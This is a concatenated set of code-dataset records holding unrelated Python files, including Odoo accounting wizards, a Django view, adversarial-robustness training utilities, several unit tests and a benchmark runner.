state_file\n","sub_path":"dvc/command/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"206724267","text":"from datetime import datetime, timedelta\nfrom odoo.tools.misc import DEFAULT_SERVER_DATE_FORMAT\n\nfrom odoo import models, fields, api, _, tools\nfrom odoo.exceptions import UserError\nimport openerp.addons.decimal_precision as dp\nimport logging\n\nimport io\nfrom io import BytesIO\n\nimport xlsxwriter\nimport shutil\nimport base64\nimport csv\nimport xlwt\nimport xml.etree.ElementTree as ET\n\nclass LibroComprasModelo(models.Model):\n _name = \"libro.diario.wizard.pdf\"\n\n fecha_desde=fields.Date()\n fecha_hasta=fields.Date()\n account_id=fields.Many2one('account.account')\n name=fields.Char()\n total_deber=fields.Float()\n total_haber=fields.Float()\n\n def float_format(self,valor):\n #valor=self.base_tax\n if valor:\n result = '{:,.2f}'.format(valor)\n result = result.replace(',','*')\n result = result.replace('.',',')\n result = result.replace('*','.')\n else:\n result=\"0,00\"\n return result\n\nclass WizardReport_1(models.TransientModel): # aqui declaro las variables del wizar que se usaran para el filtro del pdf\n _name = 'wizard.libro.diario'\n _description = \"Libro Diario\"\n\n date_from = fields.Date('Date From', default=lambda *a:(datetime.now() - timedelta(days=(1))).strftime('%Y-%m-%d'))\n date_to = fields.Date(string='Date To', default=lambda *a:datetime.now().strftime('%Y-%m-%d'))\n\n company_id = fields.Many2one('res.company','Company',default=lambda self: self.env.user.company_id.id)\n line = fields.Many2many(comodel_name='libro.diario.wizard.pdf', string='Lineas')\n\n def rif(self,aux):\n #nro_doc=self.partner_id.vat\n busca_partner = self.env['res.partner'].search([('id','=',aux)])\n for det in busca_partner:\n #tipo_doc=busca_partner.nationality\n nro_doc=str(busca_partner.vat)\n return nro_doc\n\n def periodo(self,date):\n fecha = str(date)\n fecha_aux=fecha\n mes=fecha[5:7] \n resultado=mes\n return resultado\n\n def formato_fecha(self,date):\n fecha = str(date)\n fecha_aux=fecha\n ano=fecha_aux[0:4]\n mes=fecha[5:7]\n dia=fecha[8:10] \n resultado=dia+\"/\"+mes+\"/\"+ano\n return resultado\n\n def float_format2(self,valor):\n #valor=self.base_tax\n if valor:\n result = '{:,.2f}'.format(valor)\n result = result.replace(',','*')\n result = result.replace('.',',')\n result = result.replace('*','.')\n else:\n result=\"0,00\"\n return result\n\n\n\n def print_libro_diario(self):\n \tt=self.env['libro.diario.wizard.pdf'].search([])\n \tw=self.env['wizard.libro.diario'].search([('id','!=',self.id)])\n \tt.unlink()\n \tw.unlink()\n \tcur_account=self.env['account.account'].search([],order=\"code asc\")\n \tfor det_account in cur_account:\n \t\tacum_deber=0\n \t\tacum_haber=0\n \t\tcursor = self.env['account.move.line'].search([('date', '>=', self.date_from),('date','<=',self.date_to),('account_id','=',det_account.id),('parent_state','=','posted')])\n \t\t\"\"\"if cursor:\n \t\t\traise UserError(_('cursor = %s')%cursor)\"\"\"\n \t\tif cursor:\n \t\t\tfor det in cursor:\n \t\t\t\tacum_deber=acum_deber+det.debit\n \t\t\t\tacum_haber=acum_haber+det.credit\n \t\t\t#raise UserError(_('lista_mov_line = %s')%acum_deber)\n \t\t\tvalues=({\n \t\t\t\t'account_id':det_account.id,\n \t\t\t\t'total_deber':acum_deber,\n \t\t\t\t'total_haber':acum_haber,\n \t\t\t\t'name':det_account.name,\n \t\t\t\t'fecha_desde':self.date_from,\n \t\t\t\t'fecha_hasta':self.date_to,\n \t\t\t\t})\n \t\t\tdiario_id = t.create(values)\n \tself.line=self.env['libro.diario.wizard.pdf'].search([])\n \treturn {'type': 'ir.actions.report','report_name': 'l10n_ve_libro_diario.reporte_libro_diario','report_type':\"qweb-pdf\"}\n \t#raise UserError(_('lista_mov_line = %s')%self.line)\n","sub_path":"l10n_ve_libro_diario/wizard/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337839422","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom caixa.models import Despesa, Receita, Saldo\n\nfrom users.forms import PerfilForm\n\n\n@login_required\ndef index(request):\n despesas = Despesa.objects.all().order_by(\"-id\")[:5]\n receitas = Receita.objects.all().order_by(\"-id\")[:5]\n saldo = Saldo.objects.all().order_by(\"-id\")\n user_form = PerfilForm(instance=request.user)\n return render(\n request,\n \"index.html\",\n context={\n \"user\": request.user,\n \"user_form\": user_form,\n \"despesas\": despesas,\n \"receitas\": receitas,\n \"saldo\": saldo,\n },\n )\n","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386423381","text":"import datetime\nimport os\nimport sys\n\nfrom membound import Membound\nfrom taichi.core import ti_core as _ti_core\n\nimport taichi as ti\n\ntest_suites = [Membound]\ntest_archs = [ti.cuda]\n\n\nclass PerformanceMonitoring:\n suites = []\n\n def __init__(self):\n for s in test_suites:\n self.suites.append(s())\n\n def run(self):\n print(\"Running...\")\n for s in self.suites:\n s.run()\n\n def store_to_path(self, path_with_file_name='./performance_result.md'):\n with open(path_with_file_name, 'w') as f:\n for arch in test_archs:\n for s in self.suites:\n lines = s.mdlines(arch)\n for line in lines:\n print(line, file=f)\n\n def store_with_date_and_commit_id(self, file_dir='./'):\n current_time = datetime.datetime.now().strftime(\"%Y%m%dd%Hh%Mm%Ss\")\n commit_hash = _ti_core.get_commit_hash()[:8]\n file_name = f'perfresult_{current_time}_{commit_hash}.md'\n path = os.path.join(file_dir, file_name)\n print('Storing benchmark result to: ' + path)\n self.store_to_path(path)\n\n\ndef main():\n file_dir = sys.argv[1] if len(sys.argv) > 1 else './'\n p = PerformanceMonitoring()\n p.run()\n p.store_to_path() # for /benchmark\n p.store_with_date_and_commit_id(file_dir) #for postsubmit\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"benchmarks/misc/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450986633","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\n\n\ndef squared_l2_norm(x):\n flattened = x.view(x.unsqueeze(0).shape[0], -1)\n return (flattened ** 2).sum(1)\n\n\ndef l2_norm(x):\n return squared_l2_norm(x).sqrt()\n\n\ndef pgd_whitebox(\n model,\n x,\n y,\n device,\n epsilon,\n num_steps,\n step_size,\n clip_min,\n clip_max,\n is_random=True,\n distance=\"linf\",\n):\n assert distance in [\"linf\", \"l2\"]\n\n if distance == \"linf\":\n if is_random:\n random_noise = (\n torch.FloatTensor(x.shape)\n .uniform_(-epsilon, epsilon)\n .to(device)\n .detach()\n )\n x_pgd = Variable(x.detach().data + random_noise, requires_grad=True)\n for _ in range(num_steps):\n with torch.enable_grad():\n loss = nn.CrossEntropyLoss()(model(x_pgd), y)\n loss.backward()\n x_pgd.data = x_pgd.data + step_size * x_pgd.grad.data.sign()\n eta = torch.clamp(x_pgd.data - x.data, -epsilon, epsilon)\n x_pgd.data = torch.clamp(x.data + eta, clip_min, clip_max)\n x_pgd.grad.data = torch.zeros_like(\n x_pgd.grad.data\n ) # zero out accumulated gradients\n\n if distance == \"l2\":\n if is_random:\n random_noise = (\n torch.FloatTensor(x.shape).uniform_(-1, 1).to(device).detach()\n )\n random_noise.renorm_(p=2, dim=0, maxnorm=epsilon)\n x_pgd = Variable(x.detach().clone() + random_noise, requires_grad=True)\n for _ in range(num_steps):\n with torch.enable_grad():\n loss = nn.CrossEntropyLoss()(model(x_pgd), y)\n loss.backward()\n # renorming gradient\n grad_norms = x_pgd.grad.view(len(x), -1).norm(p=2, dim=1)\n x_pgd.grad.div_(grad_norms.view(-1, 1, 1, 1))\n # avoid nan or inf if gradient is 0\n if (grad_norms == 0).any():\n x_pgd.grad[grad_norms == 0] = torch.randn_like(\n x_pgd.grad[grad_norms == 0]\n )\n # optimizer_delta.step()\n x_pgd.data += step_size * x_pgd.grad.data\n eta = x_pgd.data - x.data\n eta.renorm_(p=2, dim=0, maxnorm=epsilon)\n x_pgd.data = torch.clamp(x.data + eta, clip_min, clip_max)\n x_pgd.grad.data = torch.zeros_like(\n x_pgd.grad.data\n ) # zero out accumulated gradients\n return x_pgd\n\n\n# ref: https://github.com/yaodongyu/TRADES\ndef trades_loss(\n model,\n x_natural,\n y,\n device,\n optimizer,\n step_size,\n epsilon,\n perturb_steps,\n beta,\n clip_min,\n clip_max,\n distance=\"linf\",\n natural_criterion=nn.CrossEntropyLoss(),\n):\n # define KL-loss\n criterion_kl = nn.KLDivLoss(size_average=False)\n model.eval()\n batch_size = len(x_natural)\n # generate adversarial example\n x_adv = (\n x_natural.detach() + 0.001 * torch.randn(x_natural.shape).to(device).detach()\n )\n if distance == \"linf\":\n for _ in range(perturb_steps):\n x_adv.requires_grad_()\n with torch.enable_grad():\n loss_kl = criterion_kl(\n F.log_softmax(model(x_adv), dim=1),\n F.softmax(model(x_natural), dim=1),\n )\n grad = torch.autograd.grad(loss_kl, [x_adv])[0]\n x_adv = x_adv.detach() + step_size * torch.sign(grad.detach())\n x_adv = torch.min(\n torch.max(x_adv, x_natural - epsilon), x_natural + epsilon\n )\n x_adv = torch.clamp(x_adv, clip_min, clip_max)\n elif distance == \"l2\":\n delta = 0.001 * torch.randn(x_natural.shape).to(device).detach()\n delta = Variable(delta.data, requires_grad=True)\n\n # Setup optimizers\n optimizer_delta = optim.SGD([delta], lr=epsilon / perturb_steps * 2)\n\n for _ in range(perturb_steps):\n adv = x_natural + delta\n\n # optimize\n optimizer_delta.zero_grad()\n with torch.enable_grad():\n loss = (-1) * criterion_kl(\n F.log_softmax(model(adv), dim=1), F.softmax(model(x_natural), dim=1)\n )\n loss.backward()\n # renorming gradient\n grad_norms = delta.grad.view(batch_size, -1).norm(p=2, dim=1)\n delta.grad.div_(grad_norms.view(-1, 1, 1, 1))\n # avoid nan or inf if gradient is 0\n if (grad_norms == 0).any():\n delta.grad[grad_norms == 0] = torch.randn_like(\n delta.grad[grad_norms == 0]\n )\n optimizer_delta.step()\n\n # projection\n delta.data.add_(x_natural)\n delta.data.clamp_(clip_min, clip_max).sub_(x_natural)\n delta.data.renorm_(p=2, dim=0, maxnorm=epsilon)\n x_adv = Variable(x_natural + delta, requires_grad=False)\n else:\n x_adv = torch.clamp(x_adv, clip_min, clip_max)\n model.train()\n\n x_adv = Variable(torch.clamp(x_adv, clip_min, clip_max), requires_grad=False)\n # zero gradient\n optimizer.zero_grad()\n # calculate robust loss\n logits, logits_adv = model(x_natural), model(x_adv)\n loss_natural = natural_criterion(logits, y)\n loss_robust = (1.0 / batch_size) * criterion_kl(\n F.log_softmax(logits_adv, dim=1), F.softmax(logits, dim=1)\n )\n loss = loss_natural + beta * loss_robust\n return loss, logits, logits_adv\n","sub_path":"utils_adv.py","file_name":"utils_adv.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233635703","text":"import os\nimport sys\nimport lxml.etree\nimport Bcfg2.Server.Plugin\nfrom mock import Mock, MagicMock, patch\nfrom Bcfg2.Server.Plugins.Rules import *\n\n# add all parent testsuite directories to sys.path to allow (most)\n# relative imports in python 2.4\npath = os.path.dirname(__file__)\nwhile path != \"/\":\n if os.path.basename(path).lower().startswith(\"test\"):\n sys.path.append(path)\n if os.path.basename(path) == \"testsuite\":\n break\n path = os.path.dirname(path)\nfrom common import *\nfrom TestPlugin import TestPrioDir\n\n\nclass TestRules(TestPrioDir):\n test_obj = Rules\n\n def test_HandlesEntry(self):\n r = self.get_obj()\n r.Entries = dict(Path={\"/etc/foo.conf\": Mock(),\n \"/etc/bar.conf\": Mock()})\n r._matches = Mock()\n metadata = Mock()\n\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo.conf\")\n self.assertEqual(r.HandlesEntry(entry, metadata),\n r._matches.return_value)\n r._matches.assert_called_with(entry, metadata,\n r.Entries['Path'].keys())\n\n r._matches.reset_mock()\n entry = lxml.etree.Element(\"Path\", name=\"/etc/baz.conf\")\n self.assertEqual(r.HandlesEntry(entry, metadata),\n r._matches.return_value)\n r._matches.assert_called_with(entry, metadata,\n r.Entries['Path'].keys())\n\n r._matches.reset_mock()\n entry = lxml.etree.Element(\"Package\", name=\"foo\")\n self.assertFalse(r.HandlesEntry(entry, metadata))\n\n def test_BindEntry(self, method=\"BindEntry\"):\n r = self.get_obj()\n r.get_attrs = Mock()\n r.get_attrs.return_value = dict(overwrite=\"new\", add=\"add\",\n text=\"text\")\n entry = lxml.etree.Element(\"Test\", overwrite=\"old\", keep=\"keep\")\n metadata = Mock()\n\n getattr(r, method)(entry, metadata)\n r.get_attrs.assert_called_with(entry, metadata)\n self.assertItemsEqual(entry.attrib,\n dict(overwrite=\"old\", add=\"add\", keep=\"keep\",\n text=\"text\"))\n\n def test_HandleEntry(self):\n self.test_BindEntry(method=\"HandleEntry\")\n\n @patch(\"Bcfg2.Server.Plugin.PrioDir._matches\")\n def test__matches(self, mock_matches):\n \"\"\" test _matches() behavior regardless of state of _regex_enabled \"\"\"\n r = self.get_obj()\n metadata = Mock()\n\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo.conf\")\n rules = []\n mock_matches.return_value = True\n self.assertTrue(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n\n # test special Path cases -- adding and removing trailing slash\n mock_matches.reset_mock()\n mock_matches.return_value = False\n rules = [\"/etc/foo/\", \"/etc/bar\"]\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo\")\n self.assertTrue(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n\n mock_matches.reset_mock()\n entry = lxml.etree.Element(\"Path\", name=\"/etc/bar/\")\n self.assertTrue(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n\n @patch(\"Bcfg2.Server.Plugin.PrioDir._matches\")\n def test__matches_regex_disabled(self, mock_matches):\n \"\"\" test failure to match with regex disabled \"\"\"\n r = self.get_obj()\n self.set_regex_enabled(r, False)\n metadata = Mock()\n mock_matches.return_value = False\n\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo.conf\")\n rules = []\n self.assertFalse(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n\n @patch(\"Bcfg2.Server.Plugin.PrioDir._matches\")\n def test__matches_regex_enabled(self, mock_matches):\n \"\"\" test match with regex enabled \"\"\"\n r = self.get_obj()\n self.set_regex_enabled(r, True)\n metadata = Mock()\n mock_matches.return_value = False\n\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo.conf\")\n rules = [\"/etc/.*\\.conf\", \"/etc/bar\"]\n self.assertTrue(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n self.assertIn(\"/etc/.*\\.conf\", r._regex_cache.keys())\n\n def set_regex_enabled(self, rules_obj, state):\n \"\"\" set the state of regex_enabled for this implementation of\n Rules \"\"\"\n if not isinstance(rules_obj.core.setup, MagicMock):\n rules_obj.core.setup = MagicMock()\n rules_obj.core.setup.cfp.getboolean.return_value = state\n\n def test__regex_enabled(self):\n r = self.get_obj()\n r.core.setup = MagicMock()\n self.assertEqual(r._regex_enabled,\n r.core.setup.cfp.getboolean.return_value)\n r.core.setup.cfp.getboolean.assert_called_with(\"rules\", \"regex\",\n default=False)\n","sub_path":"testsuite/Testsrc/Testlib/TestServer/TestPlugins/TestRules.py","file_name":"TestRules.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"516744799","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\n\nimport six\n\nfrom nailgun.policy import cpu_distribution\nfrom nailgun.test import base\n\n\nclass TestCpuDistributor(base.BaseTestCase):\n\n def test_cpu_distributor(self):\n component = {'name': 'test_name',\n 'required_cpus': 5}\n distributor = cpu_distribution.CpuDistributor(component)\n self.assertEquals(component['name'], distributor.name)\n self.assertEquals(component['required_cpus'], distributor.required)\n self.assertEquals(0, len(distributor.cpus))\n\n def test_consume(self):\n component = {'name': 'test_name',\n 'required_cpus': 2}\n distributor = cpu_distribution.CpuDistributor(component)\n cpus = [0, 1, 2, 3]\n self.assertFalse(distributor.consume(cpus))\n self.assertEquals([0, 1], distributor.cpus)\n self.assertEquals([2, 3], cpus)\n self.assertEquals(0, distributor.required)\n\n def test_consume_limit(self):\n component = {'name': 'test_name',\n 'required_cpus': 4}\n distributor = cpu_distribution.CpuDistributor(component)\n cpus = [0, 1, 2, 3]\n self.assertTrue(distributor.consume(cpus, 1))\n self.assertEqual([0], distributor.cpus)\n self.assertEqual([1, 2, 3], cpus)\n self.assertEqual(3, distributor.required)\n\n def test_consume_few_cpus(self):\n component = {'name': 'test_name',\n 'required_cpus': 5}\n distributor = cpu_distribution.CpuDistributor(component)\n cpus = [0, 1]\n self.assertTrue(distributor.consume(cpus))\n self.assertEqual([0, 1], distributor.cpus)\n self.assertEqual([], cpus)\n self.assertEqual(3, distributor.required)\n\n\nclass TestGroupCpuDistributor(base.BaseTestCase):\n\n def _create_group_distributor(self, *required_cpus):\n components = []\n for idx, required in enumerate(required_cpus):\n components.append({'name': 'comp{0}'.format(idx),\n 'required_cpus': required})\n return cpu_distribution.GroupCpuDistributor(components)\n\n def test_group_cpu_distributor(self):\n required_cpus = [1, 2, 3, 4]\n distributor = self._create_group_distributor(*required_cpus)\n self.assertEquals(10, distributor.total_required)\n self.assertEquals(4, len(distributor.components))\n for required, component in six.moves.zip(\n required_cpus, distributor.components):\n self.assertEquals(required, component.required)\n\n def test_consume(self):\n required_cpus = [1, 2, 2]\n distributor = self._create_group_distributor(*required_cpus)\n cpus = [0, 1, 2, 3, 4]\n\n self.assertFalse(distributor.consume(cpus))\n self.assertEquals([], cpus)\n self.assertEquals(0, distributor.total_required)\n\n expected = [\n [0],\n [1, 2],\n [3, 4]]\n for cpus, component in zip(expected, distributor.components):\n self.assertEquals(cpus, component.cpus)\n\n\nclass TestDistributeNodeCPUs(base.BaseTestCase):\n\n def test_many_cpus_required(self):\n numa_nodes = [\n {'cpus': [0, 1, 2, 3]},\n {'cpus': [4, 5, 6, 7]}]\n components = [\n {'name': 'nova',\n 'required_cpus': 5},\n {'name': 'dpdk',\n 'required_cpus': 2}]\n expected_data = {\n 'components': {\n 'nova': [1, 2, 3, 5, 6],\n 'dpdk': [0, 4]\n },\n 'isolated_cpus': [0, 1, 2, 3, 4, 5, 6]\n }\n saved_numa_nodes = copy.deepcopy(numa_nodes)\n self.assertEquals(\n expected_data,\n cpu_distribution.distribute_node_cpus(numa_nodes, components))\n self.assertEquals(saved_numa_nodes, numa_nodes)\n\n def test_one_component(self):\n numa_nodes = [\n {'cpus': [0, 1, 2]},\n {'cpus': [3, 4, 5]}]\n components = [\n {'name': 'nova',\n 'required_cpus': 5},\n {'name': 'dpdk',\n 'required_cpus': 0}]\n expected_data = {\n 'components': {\n 'nova': [0, 1, 2, 3, 4],\n 'dpdk': []\n },\n 'isolated_cpus': [0, 1, 2, 3, 4]\n }\n self.assertEquals(\n expected_data,\n cpu_distribution.distribute_node_cpus(numa_nodes, components))\n\n def test_few_cpus_required(self):\n numa_nodes = [\n {'cpus': [0, 1, 2]},\n {'cpus': [3, 4, 5]}]\n components = [\n {'name': 'nova',\n 'required_cpus': 1},\n {'name': 'dpdk',\n 'required_cpus': 1}]\n expected_data = {\n 'components': {\n 'dpdk': [0],\n 'nova': [1]\n },\n 'isolated_cpus': [0, 1]\n }\n self.assertEquals(\n expected_data,\n cpu_distribution.distribute_node_cpus(numa_nodes, components))\n\n def test_no_cpus_required(self):\n numa_nodes = [\n {'cpus': [0, 1, 2, 3]},\n {'cpus': [4, 5, 6, 7]}]\n components = [\n {'name': 'nova',\n 'required_cpus': 0},\n {'name': 'dpdk',\n 'required_cpus': 0}]\n expected_data = {\n 'components': {\n 'dpdk': [],\n 'nova': []\n },\n 'isolated_cpus': []\n }\n self.assertEquals(\n expected_data,\n cpu_distribution.distribute_node_cpus(numa_nodes, components))\n","sub_path":"nailgun/nailgun/test/unit/test_cpu_distribution.py","file_name":"test_cpu_distribution.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478969782","text":"import pytest\nfrom pages.index import loginPage\nfrom pages.index import MainPage\nfrom pages.index import jigouPage\nfrom pages.index import docterPage\nfrom selenium import webdriver\nfrom allure import MASTER_HELPER\n\n\n@MASTER_HELPER.feature(\"心之力添加医生\")\nclass TestAdd():\n\n @MASTER_HELPER.step(\"初始化启动浏览器\")\n def setup_class(self):\n '''用例执行前,启动浏览器,创建chrome实例'''\n driver = webdriver.Chrome()\n driver.maximize_window()\n self.login_page = loginPage.LoginPage(driver)\n self.jigou_page = jigouPage.jigouPage(driver)\n self.docter_page=docterPage.docterPage(driver)\n self.main_page = MainPage.MainPage(driver)\n\n @MASTER_HELPER.step(\"关闭浏览器\")\n def teardown_class(self):\n '''用例执行完毕,关闭浏览器'''\n self.login_page.quit()\n\n\n\n @MASTER_HELPER.testcase(\"用例名:删除单个医生\")\n def test_delonedocter_001(self):\n\n with MASTER_HELPER.step(\"删除单个医生\"):\n self.login_page.xinzhili_login(username=\"beifang\", password=\"111111\")\n self.jigou_page.xinzhili_clickyiyuanguanli()\n self.jigou_page.xinzhili_clcikjigouname()\n self.jigou_page.xinzhili_clickkeshi()\n self.docter_page.xinzhili_delonedocter()\n assert_xzl_deloneyisheng=('xpath','//*[@id=\"wrapper\"]/div/div/div[2]/div/section/div[2]/div/div/div/div[3]/div/div/div/div/div[2]/span')\n assert \"暂无数据\"==self.docter_page.get_text(assert_xzl_deloneyisheng)\n\n\n\n\n\n\nif __name__ == '__main__':\n pytest.main(['-s', 'test_login.py'])","sub_path":"testcase/docter/test_002_deloneyisheng.py","file_name":"test_002_deloneyisheng.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186778276","text":"from distutils.core import setup, Extension\n\n# src = ['weather_data_module.cpp', 'DataPoint.cpp', 'WeatherData.cpp', 'SunriseSunsetData.cpp', 'MBCFunctions.cpp']\n# module1 = Extension('spam',\n# define_macros = [('MAJOR_VERSION', '1'),\n# ('MINOR_VERSION', '0')],\n# include_dirs = ['/usr/local/include'],\n# # libraries = ['tcl83'],\n# library_dirs = ['/usr/local/lib', '~/python_cpp_test'],\n# sources = ['test.cpp'])\n\nmodule = Extension('weatherStation',\n include_dirs = ['/usr/include', '/usr/include/curl'],\n library_dirs = ['/usr/lib', '/usr/lib/x86_64-linux-gnu'],\n extra_compile_args = ['-std=c++11 -lcurl -lsqlite3'],\n sources = ['weather_data_module.cpp', 'DataPoint.cpp', 'WeatherData.cpp', 'SunriseSunsetData.cpp', 'MBCFunctions.cpp'])\n\nsetup (name = 'PackageName',\n version = '1.0',\n description = 'This is a test package',\n author = 'Roger Hsiao',\n author_email = 'rogerhh@umich.edu',\n ext_modules = [module])\n","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207771882","text":"# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nimport numpy as np\nfrom op_test import OpTest\n\nimport paddle\nimport paddle.fluid as fluid\nimport paddle.fluid.core as core\nimport paddle.tensor as tensor\n\n\nclass TestTraceOp(OpTest):\n def setUp(self):\n self.op_type = \"trace\"\n self.python_api = paddle.trace\n self.init_config()\n self.outputs = {'Out': self.target}\n\n def test_check_output(self):\n self.check_output(check_eager=True)\n\n def test_check_grad(self):\n self.check_grad(['Input'], 'Out', check_eager=True)\n\n def init_config(self):\n self.case = np.random.randn(20, 6).astype('float64')\n self.inputs = {'Input': self.case}\n self.attrs = {'offset': 0, 'axis1': 0, 'axis2': 1}\n self.target = np.trace(self.inputs['Input'])\n\n\nclass TestTraceOpCase1(TestTraceOp):\n def init_config(self):\n self.case = np.random.randn(2, 20, 2, 3).astype('float32')\n self.inputs = {'Input': self.case}\n self.attrs = {'offset': 1, 'axis1': 0, 'axis2': 2}\n self.target = np.trace(\n self.inputs['Input'],\n offset=self.attrs['offset'],\n axis1=self.attrs['axis1'],\n axis2=self.attrs['axis2'],\n )\n\n\nclass TestTraceOpCase2(TestTraceOp):\n def init_config(self):\n self.case = np.random.randn(2, 20, 2, 3).astype('float32')\n self.inputs = {'Input': self.case}\n self.attrs = {'offset': -5, 'axis1': 1, 'axis2': -1}\n self.target = np.trace(\n self.inputs['Input'],\n offset=self.attrs['offset'],\n axis1=self.attrs['axis1'],\n axis2=self.attrs['axis2'],\n )\n\n\nclass TestTraceAPICase(unittest.TestCase):\n def test_case1(self):\n case = np.random.randn(2, 20, 2, 3).astype('float32')\n data1 = fluid.data(name='data1', shape=[2, 20, 2, 3], dtype='float32')\n out1 = tensor.trace(data1)\n out2 = tensor.trace(data1, offset=-5, axis1=1, axis2=-1)\n\n place = core.CPUPlace()\n exe = fluid.Executor(place)\n results = exe.run(\n fluid.default_main_program(),\n feed={\"data1\": case},\n fetch_list=[out1, out2],\n return_numpy=True,\n )\n target1 = np.trace(case)\n target2 = np.trace(case, offset=-5, axis1=1, axis2=-1)\n np.testing.assert_allclose(results[0], target1, rtol=1e-05)\n np.testing.assert_allclose(results[1], target2, rtol=1e-05)\n\n\nif __name__ == \"__main__\":\n paddle.enable_static()\n unittest.main()\n","sub_path":"python/paddle/fluid/tests/unittests/test_trace_op.py","file_name":"test_trace_op.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"153865952","text":"#!/usr/bin/python3\n\n\"\"\"\n977. Squares of a Sorted Array\n\nGiven an array of integers A sorted in non-decreasing order, return an array of the squares of each number, also in sorted non-decreasing order.\n\nExample 1:\n\nInput: [-4,-1,0,3,10]\nOutput: [0,1,9,16,100]\nExample 2:\n\nInput: [-7,-3,2,3,11]\nOutput: [4,9,9,49,121]\n \nNote:\n1 <= A.length <= 10000\n-10000 <= A[i] <= 10000\nA is sorted in non-decreasing order.\n\"\"\"\n\ndef squared_sorted_array(arr):\n left = 0 \n right = len(arr) - 1\n result = [ 0 for x in arr]\n\n for i in range(len(arr)-1, 0, -1):\n if abs(arr[left]) > abs(arr[right]) :\n result[i] = arr[left] * arr[left]\n left += 1\n else:\n result[i] = arr[right] * arr[right]\n right -= 1\n\n return result\n\narr1 = [ -17, -16, -5, 0, 4, 6, 20]\nprint(squared_sorted_array(arr1))","sub_path":"Python/interview_questions/two pointers/sorted_squared_array.py","file_name":"sorted_squared_array.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"188487680","text":"import openpyxl as op\r\nbook = op.load_workbook(\"excelTest01.xlsx\")\r\nsheetList = book.get_sheet_names()\r\n# print(test)\r\nsheet = book.get_sheet_by_name(sheetList[0]) # get a first sheet\r\n\r\nrows = ((1, 2, 3),\r\n (2, 3, 4),\r\n (4, 5, 6)\r\n )\r\n\r\nfor row in rows:\r\n sheet.append(row)\r\n\r\nbook.save(\"excelTest01.xlsx\")","sub_path":"excelFileTest02.py","file_name":"excelFileTest02.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266541081","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, osv\nfrom openerp import models, fields, api, _\nfrom datetime import datetime,timedelta,date\nfrom dateutil import parser\nimport logging\nfrom datetime import datetime, date, timedelta\nimport calendar\nimport base64 \nimport itertools\nimport requests\nimport json\nfrom io import StringIO\nimport io \nfrom . import crear_informe_caja_excel\nimport math\nimport time\nimport pytz\nimport openpyxl\nfrom openpyxl import Workbook\nimport openpyxl.worksheet\nimport unicodedata\nfrom openpyxl import Workbook\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font\nfrom openpyxl.styles.borders import Border, Side\nfrom openpyxl.drawing.image import Image\nimport commands\nimport os\n\n#----------------------------------------------------------\n# Creacion de campos para la pantalla -\n#---------------------------------------------------------- \n\nclass ReporteCaja(models.TransientModel):\n _name=\"reporte.caja\"\n _rec_name = 'titulo'\n\n 